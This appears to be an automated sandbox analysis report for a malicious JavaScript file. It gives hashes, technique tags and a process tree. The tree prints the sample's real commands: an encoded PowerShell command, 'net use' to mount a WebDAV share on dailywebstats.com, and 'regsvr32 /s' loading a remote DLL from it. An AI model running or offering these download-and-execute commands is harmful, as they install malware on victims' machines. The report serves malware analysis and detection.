Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
25/07/2024, 20:14
Static task
static1
Behavioral task
behavioral1
Sample
169720341759912807.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
169720341759912807.js
Resource
win10v2004-20240704-en
General
-
Target
169720341759912807.js
-
Size
17KB
-
MD5
fc60f0c30d8afab31868e3d7306c3445
-
SHA1
6a56fb2832fbfc3a238f7767ea545d77c92d65d1
-
SHA256
7749a2b67ce4b9953a9d1c538be4446ab0027a70aea55456c10c750837a21b7a
-
SHA512
f0f5a40eb58b38a179278f55af7113996752718d1f8b286b596280c847f073d3523e3933f74358d20dbd8d01d2eec99f35b9dc071671b11f4a4aa84bc1b15110
-
SSDEEP
384:L5+OIHtSgRFW2ZIRTWbOeWd14q821fET4Cdds+iWprS9prORWHFr1PK5CMTpnbh1:L5+OIHtSgRFW2ZIRTWbOeWd14q821fEt
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2776 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2196 wrote to memory of 2776 2196 wscript.exe 30 PID 2196 wrote to memory of 2776 2196 wscript.exe 30 PID 2196 wrote to memory of 2776 2196 wscript.exe 30 PID 2776 wrote to memory of 2812 2776 powershell.exe 32 PID 2776 wrote to memory of 2812 2776 powershell.exe 32 PID 2776 wrote to memory of 2812 2776 powershell.exe 32 PID 2776 wrote to memory of 2712 2776 powershell.exe 33 PID 2776 wrote to memory of 2712 2776 powershell.exe 33 PID 2776 wrote to memory of 2712 2776 powershell.exe 33 PID 2776 wrote to memory of 2712 2776 powershell.exe 33 PID 2776 wrote to memory of 2712 2776 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\169720341759912807.js1⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADEANwAwADkANgAxADAAMAAxADUAOQA5ADgALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:2812
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\1709610015998.dll3⤵PID:2712
-
-